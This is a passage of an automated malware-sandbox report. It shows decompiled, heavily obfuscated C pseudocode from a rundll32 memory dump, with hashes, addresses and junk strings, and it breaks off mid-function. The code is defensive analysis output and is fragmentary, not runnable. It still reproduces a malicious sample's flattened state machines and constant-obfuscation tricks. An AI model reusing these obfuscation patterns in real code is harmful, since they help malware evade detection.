Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$74$D m$IU$N@$O[9$$[%$wC$"
API String ID: 0-558422104
Opcode ID: 2675ae461ccb92bc9aa4d9b05c099971a559f21313b798f0b9f285c8e0234f45
Instruction ID: 8e6206461aba717ba707694a396f0dfdb8920fafe3cc9540281e3933b8d57a86
Opcode Fuzzy Hash: 2675ae461ccb92bc9aa4d9b05c099971a559f21313b798f0b9f285c8e0234f45
Instruction Fuzzy Hash: 9FD15472518341DFD768CF25C88A81BBBE1BBC4748F50891DF5A696260C7BAC958CF03

Uniqueness

Uniqueness Score: -1.00%

Function 002912B6, Relevance: 11.4, Strings: 9, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E002912B6(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t153;
				signed int _t162;
				signed int _t170;
				void* _t181;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				signed int* _t208;
				signed int* _t211;

				_push(_a12);
				_t207 = _a4;
				_t208 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t153);
				_v60 = 0xaf2d;
				_t211 =  &(( &_v108)[5]);
				_t189 = 0x37ea2971;
				_t183 = 0x30;
				_v60 = _v60 / _t183;
				_v60 = _v60 ^ 0x00004201;
				_v92 = 0x7cb3;
				_t184 = 0x57;
				_v92 = _v92 / _t184;
				_v92 = _v92 + 0x9582;
				_v92 = _v92 ^ 0x0000dc29;
				_v108 = 0x8257;
				_v108 = _v108 >> 1;
				_v108 = _v108 >> 0xc;
				_t185 = 9;
				_v108 = _v108 * 0x72;
				_v108 = _v108 ^ 0x00004fc2;
				_v96 = 0x40c5;
				_v96 = _v96 ^ 0xa116dc0c;
				_v96 = _v96 ^ 0x7e568c0f;
				_v96 = _v96 ^ 0xdf403fd9;
				_v52 = 0x31c9;
				_v52 = _v52 | 0xd6f66353;
				_v52 = _v52 ^ 0xd6f64a6d;
				_v88 = 0x36e;
				_v88 = _v88 + 0x45a7;
				_v88 = _v88 ^ 0x4bbc027d;
				_v88 = _v88 ^ 0x4bbc3029;
				_v56 = 0x4f5b;
				_v56 = _v56 | 0x06421eeb;
				_v56 = _v56 ^ 0x06421dbc;
				_v104 = 0x1be2;
				_v104 = _v104 ^ 0xa0f43b33;
				_v104 = _v104 + 0xb886;
				_v104 = _v104 + 0x9b4d;
				_v104 = _v104 ^ 0xa0f5230d;
				_v100 = 0xf441;
				_v100 = _v100 | 0x37752f6e;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0xddd7fc83;
				_v64 = 0xb621;
				_v64 = _v64 ^ 0xe17d0a38;
				_v64 = _v64 ^ 0xe17da420;
				_v76 = 0x6c67;
				_v76 = _v76 | 0x1df80c0d;
				_v76 = _v76 / _t185;
				_v76 = _v76 ^ 0x03544df1;
				_v80 = 0xa2b5;
				_v80 = _v80 ^ 0x3ecf2107;
				_v80 = _v80 << 8;
				_v80 = _v80 ^ 0xcf839442;
				_v84 = 0xd8d1;
				_v84 = _v84 | 0xc8688e93;
				_v84 = _v84 + 0x4b2f;
				_v84 = _v84 ^ 0xc869620a;
				_v48 = 0x1cf5;
				_t162 = _v48;
				_t186 = 0x11;
				_t205 = _t162 % _t186;
				_v48 = _t162 / _t186;
				_v48 = _v48 ^ 0x0000080a;
				_v68 = 0x887a;
				_v68 = _v68 << 9;
				_v68 = _v68 + 0x2221;
				_v68 = _v68 ^ 0x01112a3a;
				_v72 = 0x5979;
				_v72 = _v72 >> 8;
				_v72 = _v72 + 0xffffd314;
				_v72 = _v72 ^ 0xffffbc88;
				do {
					while(_t189 != 0x206ebdf) {
						if(_t189 == 0xe1b62f3) {
							_push(_t189);
							_push(_t189);
							_t170 = E002A9E2B(_t208[1]);
							_t211 =  &(_t211[3]);
							 *_t208 = _t170;
							__eflags = _t170;
							if(__eflags != 0) {
								_t189 = 0x1e956d51;
								continue;
							}
						} else {
							if(_t189 == 0x10034e2b) {
								E002A5677(_v48, _v68, __eflags, _t207 + 4,  &_v44, _v72);
							} else {
								if(_t189 == 0x168c5bd0) {
									_t208[1] = E002ACDEF(_t207);
									_t181 = E002A8E0A(0x1000, _t205, __eflags, 0x400);
									_t211 = _t211 - 0xc + 0x10;
									_t189 = 0xe1b62f3;
									_t208[1] = _t208[1] + _t181;
									continue;
								} else {
									if(_t189 == 0x1e956d51) {
										_t205 =  &_v44;
										E002ACF95(_v100,  &_v44, _t208, _v64);
										_t189 = 0x206ebdf;
										continue;
									} else {
										if(_t189 != 0x37ea2971) {
											goto L13;
										} else {
											 *_t208 = 0;
											_t189 = 0x168c5bd0;
											_t208[1] = 0;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t208;
						_t152 =  *_t208 != 0;
						__eflags = _t152;
						return 0 | _t152;
					}
					_t205 = _v76;
					E002931A5( *_t207, _v76, _v80,  &_v44, _v84);
					_t211 =  &(_t211[3]);
					_t189 = 0x10034e2b;
					L13:
					__eflags = _t189 - 0x16072bb2;
				} while (__eflags != 0);
				goto L16;
			}

0x002912bd
0x002912c4
0x002912cb
0x002912cd
0x002912d4
0x002912d5
0x002912d6
0x002912d7
0x002912dc
0x002912e4
0x002912ed
0x002912f4
0x002912f9
0x002912ff
0x00291307
0x00291313
0x00291318
0x0029131e
0x00291326
0x0029132e
0x00291336
0x0029133a
0x00291344
0x00291345
0x00291349
0x00291351
0x00291359
0x00291361
0x00291369
0x00291371
0x00291379
0x00291381
0x00291389
0x00291391
0x00291399
0x002913a1
0x002913a9
0x002913b1
0x002913b9
0x002913c1
0x002913c9
0x002913d1
0x002913d9
0x002913e1
0x002913e9
0x002913f1
0x002913f9
0x002913fe
0x00291406
0x0029140e
0x00291416
0x0029141e
0x00291426
0x00291434
0x00291438
0x00291440
0x00291448
0x00291450
0x00291455
0x0029145d
0x00291465
0x0029146d
0x00291475
0x0029147d
0x00291485
0x0029148d
0x0029148e
0x00291495
0x00291499
0x002914a1
0x002914a9
0x002914ae
0x002914b6
0x002914be
0x002914c6
0x002914cb
0x002914d3
0x002914dd
0x002914dd
0x002914ef
0x00291589
0x0029158a
0x0029158e
0x00291593
0x00291596
0x00291598
0x0029159a
0x0029159c
0x00000000
0x0029159c
0x002914f5
0x002914fb
0x002915e9
0x00291501
0x00291503
0x00291544
0x00291564
0x00291569
0x0029156c
0x00291571
0x00000000
0x00291505
0x0029150b
0x0029152a
0x0029152f
0x00291536
0x00000000
0x0029150d
0x00291513
0x00000000
0x00291519
0x00291519
0x0029151b
0x0029151d
0x00000000
0x0029151d
0x00291513
0x0029150b
0x00291503
0x002914fb
0x002915f2
0x002915f4
0x002915f8
0x002915f8
0x002915ff
0x002915ff
0x002915b3
0x002915b9
0x002915be
0x002915c1
0x002915c6
0x002915c6
0x002915c6
0x00000000

Strings

[O, xrefs: 002913A9
q)7, xrefs: 0029150D
n/u7, xrefs: 002913F1
yY, xrefs: 002914BE
!", xrefs: 002914AE
/K, xrefs: 0029146D
q)7, xrefs: 002912ED
gl, xrefs: 0029141E
8}, xrefs: 0029140E

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !"$/K$8}$[O$gl$n/u7$q)7$q)7$yY
API String ID: 0-4086401284
Opcode ID: 9dec96f573629faa3aeeae563c82008c1b498af66f6e4c3584d85b9525ca72b0
Instruction ID: 6dbc2d33037bdd47d418a781eebda50c21f5ac9fe16efd3cfbb778dbb61d5025
Opcode Fuzzy Hash: 9dec96f573629faa3aeeae563c82008c1b498af66f6e4c3584d85b9525ca72b0
Instruction Fuzzy Hash: 658164B15193029FD758CF22C58991BBBE0FBC4B08F90891DF596962A0D7B5DA28CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A5748, Relevance: 10.2, Strings: 8, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002A5748() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t209;
				signed int _t210;
				signed int _t215;
				void* _t217;
				void* _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t246;
				signed int* _t248;

				_t248 =  &_v80;
				_v28 = 0xfa43;
				_v28 = _v28 + 0xffff64db;
				_t217 = 0x13dbd413;
				_v28 = _v28 + 0xffffd5d5;
				_v28 = _v28 ^ 0x000134f3;
				_v44 = 0xe15e;
				_v44 = _v44 + 0xffffcae3;
				_v44 = _v44 + 0xffff3556;
				_v44 = _v44 ^ 0xfffff2c7;
				_v80 = 0x530b;
				_v80 = _v80 ^ 0x3fe69bb9;
				_v80 = _v80 | 0x4be8190d;
				_v80 = _v80 + 0xffffd44d;
				_v80 = _v80 ^ 0x7feeea52;
				_v52 = 0xe8d1;
				_v52 = _v52 + 0xffff21e5;
				_v52 = _v52 ^ 0x098fee2a;
				_v52 = _v52 ^ 0x098fef4c;
				_v4 = 0x1295;
				_v4 = _v4 >> 4;
				_v4 = _v4 ^ 0x00006adf;
				_v24 = 0x2f65;
				_v24 = _v24 << 0xd;
				_v24 = _v24 * 0x3f;
				_t239 = 0;
				_v24 = _v24 ^ 0x753b3344;
				_v60 = 0x50a7;
				_t240 = 0x24;
				_v60 = _v60 / _t240;
				_t241 = 0x43;
				_v60 = _v60 * 0x29;
				_v60 = _v60 + 0xfffffdce;
				_v60 = _v60 ^ 0x00004fc4;
				_v72 = 0x5e36;
				_v72 = _v72 | 0x0485770b;
				_v72 = _v72 >> 8;
				_v72 = _v72 >> 0xe;
				_v72 = _v72 ^ 0x0000439e;
				_v8 = 0xc87a;
				_v8 = _v8 + 0xffffbc11;
				_v8 = _v8 ^ 0x0000b2bf;
				_v76 = 0x1492;
				_v76 = _v76 << 9;
				_v76 = _v76 / _t241;
				_v76 = _v76 ^ 0x0d275196;
				_v76 = _v76 ^ 0x0d27c2b1;
				_v40 = 0xba33;
				_v40 = _v40 + 0x4a5;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x000057b2;
				_v32 = 0xffd5;
				_v32 = _v32 ^ 0x3e7e029e;
				_v32 = _v32 + 0xffff5154;
				_v32 = _v32 ^ 0x3e7e6a26;
				_v64 = 0xbf35;
				_v64 = _v64 ^ 0xe1ac7b80;
				_v64 = _v64 + 0xffff702f;
				_t242 = 0x62;
				_v64 = _v64 / _t242;
				_v64 = _v64 ^ 0x024dad4d;
				_v68 = 0x4a07;
				_v68 = _v68 + 0xffffc583;
				_v68 = _v68 ^ 0xf8490e58;
				_v68 = _v68 + 0xffff6961;
				_v68 = _v68 ^ 0xf8486714;
				_v36 = 0x947d;
				_v36 = _v36 ^ 0x02a278b7;
				_t243 = 0x49;
				_v36 = _v36 / _t243;
				_v36 = _v36 ^ 0x0009425c;
				_v12 = 0x5df1;
				_t244 = 0x5d;
				_t247 = _v4;
				_v12 = _v12 / _t244;
				_t245 = _v4;
				_t216 = _v4;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x000012fd;
				_v16 = 0x3aaa;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0xe687;
				_v16 = _v16 ^ 0x0000fb2b;
				_v20 = 0x1461;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x0000567d;
				_v56 = 0xa3a7;
				_v56 = _v56 << 0x10;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x02eaa81a;
				_v48 = 0xd302;
				_v48 = _v48 * 0x5a;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x000f9462;
				while(1) {
					_t209 = 0x5c;
					L2:
					while(_t217 != 0x4dc0f45) {
						if(_t217 == 0xbb35233) {
							E002930A4(_t247, _v32, _v64, _v68, _v36);
							_t248 =  &(_t248[3]);
							_t217 = 0xd909d60;
							while(1) {
								_t209 = 0x5c;
								goto L2;
							}
						} else {
							if(_t217 == 0xd909d60) {
								E002930A4(_t216, _v12, _v16, _v20, _v56);
							} else {
								if(_t217 == 0x13dbd413) {
									_t217 = 0x28ffab12;
									continue;
								} else {
									if(_t217 == 0x1afb5bd3) {
										E0029F3A1(_v72, _v8, _v76, _t247, _v40);
										_t248 =  &(_t248[3]);
										_t239 =  !=  ? 1 : _t239;
										_t217 = 0xbb35233;
										while(1) {
											_t209 = 0x5c;
											goto L2;
										}
									} else {
										if(_t217 == 0x28ffab12) {
											_t246 =  *0x2b0724; // 0x340cf0
											while( *_t246 != _t209) {
												_t246 = _t246 + 2;
											}
											_t245 = _t246 + 2;
											_t217 = 0x2f784668;
											continue;
										} else {
											if(_t217 != 0x2f784668) {
												L21:
												if(_t217 != 0x2f775aa3) {
													continue;
												} else {
												}
											} else {
												_t215 = E002A9EEB(_t217, _v44, _v48, _t217, _v80, _v52);
												_t216 = _t215;
												_t248 =  &(_t248[4]);
												if(_t215 != 0) {
													_t217 = 0x4dc0f45;
													while(1) {
														_t209 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						L24:
						return _t239;
					}
					_t210 = E0029E172(_v4, _v24, _t216, _v28, _t245, _v60);
					_t247 = _t210;
					_t248 =  &(_t248[4]);
					if(_t210 == 0) {
						_t217 = 0xd909d60;
						_t209 = 0x5c;
						goto L21;
					} else {
						_t217 = 0x1afb5bd3;
						continue;
					}
					goto L24;
				}
			}

0x002a5748
0x002a574f
0x002a5759
0x002a5761
0x002a5766
0x002a576e
0x002a5776
0x002a577e
0x002a5786
0x002a578e
0x002a5796
0x002a579e
0x002a57a6
0x002a57ae
0x002a57b6
0x002a57be
0x002a57c6
0x002a57ce
0x002a57d6
0x002a57de
0x002a57e6
0x002a57eb
0x002a57f3
0x002a57fb
0x002a5805
0x002a5809
0x002a580b
0x002a5813
0x002a5821
0x002a5826
0x002a5831
0x002a5834
0x002a5838
0x002a5840
0x002a5848
0x002a5850
0x002a5858
0x002a585d
0x002a5862
0x002a586a
0x002a5872
0x002a587a
0x002a5882
0x002a588a
0x002a5897
0x002a589b
0x002a58a3
0x002a58ab
0x002a58b3
0x002a58bb
0x002a58bf
0x002a58c7
0x002a58cf
0x002a58d7
0x002a58df
0x002a58e7
0x002a58ef
0x002a58f7
0x002a5903
0x002a5906
0x002a590a
0x002a5912
0x002a591a
0x002a5922
0x002a592a
0x002a5934
0x002a593c
0x002a5944
0x002a5952
0x002a5957
0x002a595d
0x002a5965
0x002a5971
0x002a5974
0x002a5978
0x002a5981
0x002a5985
0x002a5989
0x002a598d
0x002a5995
0x002a599d
0x002a59a2
0x002a59aa
0x002a59b2
0x002a59ba
0x002a59bf
0x002a59c4
0x002a59cc
0x002a59d4
0x002a59d9
0x002a59e3
0x002a59e7
0x002a59ef
0x002a59fc
0x002a5a00
0x002a5a05
0x002a5a0d
0x002a5a0f
0x00000000
0x002a5a10
0x002a5a22
0x002a5aea
0x002a5aef
0x002a5af2
0x002a5a0d
0x002a5a0f
0x00000000
0x002a5a0f
0x002a5a28
0x002a5a2e
0x002a5b4e
0x002a5a34
0x002a5a3a
0x002a5ace
0x00000000
0x002a5a40
0x002a5a46
0x002a5ab4
0x002a5abb
0x002a5ac1
0x002a5ac4
0x002a5a0d
0x002a5a0f
0x00000000
0x002a5a0f
0x002a5a48
0x002a5a4e
0x002a5a86
0x002a5a91
0x002a5a8e
0x002a5a8e
0x002a5a96
0x002a5a99
0x00000000
0x002a5a50
0x002a5a56
0x002a5b2e
0x002a5b34
0x00000000
0x00000000
0x002a5b3a
0x002a5a5c
0x002a5a6d
0x002a5a72
0x002a5a74
0x002a5a79
0x002a5a7f
0x002a5a0d
0x002a5a0f
0x00000000
0x002a5a0f
0x002a5a0d
0x002a5a79
0x002a5a56
0x002a5a4e
0x002a5a46
0x002a5a3a
0x002a5a2e
0x002a5b56
0x002a5b5f
0x002a5b5f
0x002a5b0e
0x002a5b13
0x002a5b15
0x002a5b1a
0x002a5b28
0x002a5b2d
0x00000000
0x002a5b1c
0x002a5b1c
0x00000000
0x002a5b1c
0x00000000
0x002a5b1a

Strings

}V, xrefs: 002A59C4
6^, xrefs: 002A5848
\B, xrefs: 002A595D
D3;u, xrefs: 002A580B
&j~>, xrefs: 002A58DF
hFx/, xrefs: 002A5A50
^, xrefs: 002A5776
hFx/, xrefs: 002A5A99

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: &j~>$6^$D3;u$\B$^$hFx/$hFx/$}V
API String ID: 1725840886-2910805425
Opcode ID: 5202367665abe27be60b8fa83d496197beb8cd94d2389391f0e6dc946242b42e
Instruction ID: 3b08d72d2d3865caa043d5c4cf24f0249d81ac64342fdb5eca8d44179776894f
Opcode Fuzzy Hash: 5202367665abe27be60b8fa83d496197beb8cd94d2389391f0e6dc946242b42e
Instruction Fuzzy Hash: DDA163726187418FD368CF66C88941BFBF1EBC5718F048A1DF196962A0D7B58A19CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029B0E1, Relevance: 10.2, Strings: 8, Instructions: 159
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0029B0E1() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				unsigned int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t146;
				void* _t150;
				signed int _t151;
				void* _t152;
				void* _t173;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t181;
				signed int* _t182;

				_t182 =  &_v568;
				_v564 = 0x5008;
				_t152 = 0xef789e4;
				_t175 = 0x11;
				_v564 = _v564 / _t175;
				_v564 = _v564 + 0xeb65;
				_t173 = 0;
				_v564 = _v564 + 0x8abc;
				_v564 = _v564 ^ 0x00015271;
				_v528 = 0xd644;
				_v528 = _v528 | 0x40ed2d51;
				_v528 = _v528 ^ 0x40edea71;
				_v552 = 0xe5c5;
				_v552 = _v552 + 0xe9a1;
				_v552 = _v552 ^ 0xf9447d78;
				_v552 = _v552 ^ 0xf945bee8;
				_v536 = 0x956;
				_v536 = _v536 >> 2;
				_v536 = _v536 | 0x02042004;
				_v536 = _v536 ^ 0x02046f38;
				_v540 = 0xf32a;
				_v540 = _v540 << 2;
				_t176 = 0x78;
				_v540 = _v540 * 0x7b;
				_v540 = _v540 ^ 0x01d36b4e;
				_v548 = 0x6b84;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 / _t176;
				_v548 = _v548 ^ 0x000026e2;
				_v556 = 0x8cd;
				_v556 = _v556 >> 9;
				_v556 = _v556 ^ 0x00005c70;
				_v524 = 0xd9af;
				_t177 = 0x7b;
				_v524 = _v524 / _t177;
				_v524 = _v524 ^ 0x000043ef;
				_v568 = 0x8668;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x3ff3bfbf;
				_t178 = 0x37;
				_v568 = _v568 / _t178;
				_v568 = _v568 ^ 0x00db8acb;
				_v560 = 0x8717;
				_t179 = 0x13;
				_t181 = _v556;
				_v560 = _v560 / _t179;
				_v560 = _v560 << 7;
				_v560 = _v560 >> 6;
				_v560 = _v560 ^ 0x0000038a;
				_v544 = 0x4d31;
				_v544 = _v544 * 0x3d;
				_v544 = _v544 | 0x70257490;
				_v544 = _v544 ^ 0x70370503;
				_v532 = 0x8e14;
				_v532 = _v532 << 0xf;
				_v532 = _v532 ^ 0x470a638b;
				_t151 = _v556;
				_t180 = _v556;
				do {
					while(_t152 != 0x180e2ef) {
						if(_t152 == 0xef789e4) {
							_t152 = 0x16a1f901;
							continue;
						}
						if(_t152 == 0x16a1f901) {
							_t146 = E002957A2();
							_t180 = _t146;
							if(_t146 == 0) {
								L9:
								return _t173;
							}
							_t152 = 0x2b0760f7;
							continue;
						}
						if(_t152 == 0x1b1ae427) {
							_t151 = E002A8696(_v544, _t181, _v532);
							_t152 = 0x36eaec4e;
							continue;
						}
						if(_t152 == 0x2b0760f7) {
							_t150 = E00293618(_v552, _v536, _t180, _v540, _v548, _t152,  &_v520);
							_t182 =  &(_t182[5]);
							if(_t150 == 0) {
								goto L9;
							}
							_t152 = 0x180e2ef;
							continue;
						}
						if(_t152 != 0x36eaec4e) {
							goto L17;
						}
						_v568 = 0x7790;
						_v568 = _v568 ^ 0xaf12840f;
						_v568 = _v568 >> 0xd;
						_v568 = _v568 + 0x4419;
						_v568 = _v568 ^ 0x2a22bc52;
						if(_t151 == _v568) {
							_t173 = 1;
						}
						goto L9;
					}
					_t181 = E002A2089(_v556, _v524, _v568,  &_v520);
					_t152 = 0x1b1ae427;
					L17:
				} while (_t152 != 0x2f88791e);
				goto L9;
			}

0x0029b0e1
0x0029b0e7
0x0029b0f5
0x0029b100
0x0029b105
0x0029b10b
0x0029b113
0x0029b115
0x0029b11d
0x0029b125
0x0029b12d
0x0029b135
0x0029b13d
0x0029b145
0x0029b14d
0x0029b155
0x0029b15d
0x0029b165
0x0029b16a
0x0029b172
0x0029b17a
0x0029b182
0x0029b18c
0x0029b18f
0x0029b193
0x0029b19b
0x0029b1a3
0x0029b1b0
0x0029b1b4
0x0029b1bc
0x0029b1c4
0x0029b1c9
0x0029b1d1
0x0029b1dd
0x0029b1e2
0x0029b1e8
0x0029b1f0
0x0029b1f8
0x0029b1fd
0x0029b209
0x0029b20e
0x0029b214
0x0029b21c
0x0029b228
0x0029b22b
0x0029b22f
0x0029b233
0x0029b238
0x0029b23d
0x0029b245
0x0029b252
0x0029b256
0x0029b25e
0x0029b266
0x0029b26e
0x0029b273
0x0029b27b
0x0029b27f
0x0029b283
0x0029b283
0x0029b295
0x0029b368
0x00000000
0x0029b368
0x0029b2a1
0x0029b353
0x0029b358
0x0029b35c
0x0029b2f1
0x0029b2fd
0x0029b2fd
0x0029b35e
0x00000000
0x0029b35e
0x0029b2ad
0x0029b33f
0x0029b341
0x00000000
0x0029b341
0x0029b2b5
0x0029b315
0x0029b31a
0x0029b31f
0x00000000
0x00000000
0x0029b321
0x00000000
0x0029b321
0x0029b2bd
0x00000000
0x00000000
0x0029b2c3
0x0029b2cb
0x0029b2d3
0x0029b2d8
0x0029b2e0
0x0029b2ec
0x0029b2f0
0x0029b2f0
0x00000000
0x0029b2ec
0x0029b38a
0x0029b38c
0x0029b391
0x0029b391
0x00000000

Strings

C, xrefs: 0029B1E8
N6, xrefs: 0029B2B7
p\, xrefs: 0029B1C9
V, xrefs: 0029B15D
q@, xrefs: 0029B135
1M, xrefs: 0029B245
N6, xrefs: 0029B341
e, xrefs: 0029B10B

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1M$N6$N6$V$e$p\$q@$C
API String ID: 0-1521160778
Opcode ID: 47f7148c556bceb475f2772495399a1ff8950f59f9c56cf1113f481c5ca67ecf
Instruction ID: 55b7b1b40642d0aff2b20d85621bb762904b3ccf9fe4472921ecbcb002647728
Opcode Fuzzy Hash: 47f7148c556bceb475f2772495399a1ff8950f59f9c56cf1113f481c5ca67ecf
Instruction Fuzzy Hash: 2961B47151D3419BD788CF21D58A41FBBE1FBC4758F50491EF8869A2A0C7B4CA18CB87

Uniqueness

Uniqueness Score: -1.00%

Function 002A8978, Relevance: 9.0, Strings: 7, Instructions: 200
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002A8978() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _t177;
				signed int _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				signed int _t188;
				signed int _t189;
				void* _t208;
				char _t212;
				signed int* _t213;
				void* _t215;

				_t213 =  &_v108;
				_v16 = 0x3c8f5;
				_t186 = 0;
				_v12 = 0;
				_v8 = 0;
				_v100 = 0xc6b2;
				_v100 = _v100 + 0xffff78c0;
				_v100 = _v100 + 0x52d8;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x00000005;
				_v72 = 0xab4;
				_v72 = _v72 ^ 0x77cfe995;
				_v72 = _v72 >> 2;
				_v72 = _v72 ^ 0x1df3b9dd;
				_v76 = 0xf8c4;
				_v76 = _v76 + 0xffffc449;
				_t188 = 0x25;
				_v76 = _v76 / _t188;
				_v76 = _v76 ^ 0x0000562a;
				_t208 = 0x72c744f;
				_v84 = 0x4617;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0xbaf475b9;
				_v84 = _v84 ^ 0xf0fbb922;
				_v84 = _v84 ^ 0x4a0fd9a7;
				_v88 = 0xf3c6;
				_v88 = _v88 + 0xffffab55;
				_v88 = _v88 + 0x3ba7;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x00007f81;
				_v68 = 0x4aec;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0xfffff976;
				_v68 = _v68 ^ 0xfffff341;
				_v48 = 0x175;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0x0002c29d;
				_v60 = 0xa147;
				_v60 = _v60 >> 5;
				_v60 = _v60 ^ 0x00007dc4;
				_v104 = 0x1c00;
				_v104 = _v104 ^ 0x17ddf75c;
				_v104 = _v104 + 0x23f7;
				_v104 = _v104 + 0xb870;
				_v104 = _v104 ^ 0x17de90cf;
				_v80 = 0xd6e8;
				_v80 = _v80 ^ 0xb1aea3a2;
				_v80 = _v80 | 0x4c1ba216;
				_v80 = _v80 ^ 0xfdbfa62e;
				_v108 = 0xaa26;
				_v108 = _v108 << 7;
				_v108 = _v108 << 0xb;
				_v108 = _v108 << 0xd;
				_v108 = _v108 ^ 0x000055c6;
				_v52 = 0x4fd5;
				_t189 = 0x32;
				_v52 = _v52 / _t189;
				_v52 = _v52 ^ 0x00003e36;
				_v56 = 0xa2d9;
				_v56 = _v56 ^ 0x39caebbb;
				_v56 = _v56 ^ 0x39ca05a5;
				_v92 = 0x8073;
				_v92 = _v92 + 0xffff9dce;
				_v92 = _v92 >> 3;
				_v92 = _v92 | 0xecb06e9c;
				_v92 = _v92 ^ 0xecb02b11;
				_v96 = 0x9ec7;
				_v96 = _v96 * 0x45;
				_v96 = _v96 * 0xb;
				_v96 = _v96 + 0xffff076d;
				_v96 = _v96 ^ 0x01d5e378;
				_v44 = 0xc2f0;
				_v44 = _v44 * 0x57;
				_v44 = _v44 ^ 0x0042286a;
				_v64 = 0x222a;
				_v64 = _v64 ^ 0x827e40a1;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x209fb485;
				_t207 = _v40;
				_t212 = _v40;
				goto L1;
				do {
					while(1) {
						L1:
						_t215 = _t208 - 0x1e157ff7;
						if(_t215 > 0) {
							break;
						}
						if(_t215 == 0) {
							E0029EF80(_v92, _v36, _v96);
							_pop(_t191);
							_t208 = 0x2855765d;
							continue;
						}
						if(_t208 == 0x62b7233) {
							E002944D7(_v20 + 1, _v52, _t191, _v56, _v24);
							_t177 =  *0x2b0724; // 0x340cf0
							_t191 = _v28;
							_t213 =  &(_t213[3]);
							_t186 = 1;
							_t208 = 0x1e157ff7;
							 *((intOrPtr*)(_t177 + 0x440)) = _v28;
							continue;
						}
						if(_t208 == 0x72c744f) {
							_t208 = 0x109c2e25;
							continue;
						}
						if(_t208 == 0x109c2e25) {
							_t212 = E0029334E();
							_t208 = 0x2949e215;
							continue;
						}
						if(_t208 != 0x15d49008) {
							goto L21;
						} else {
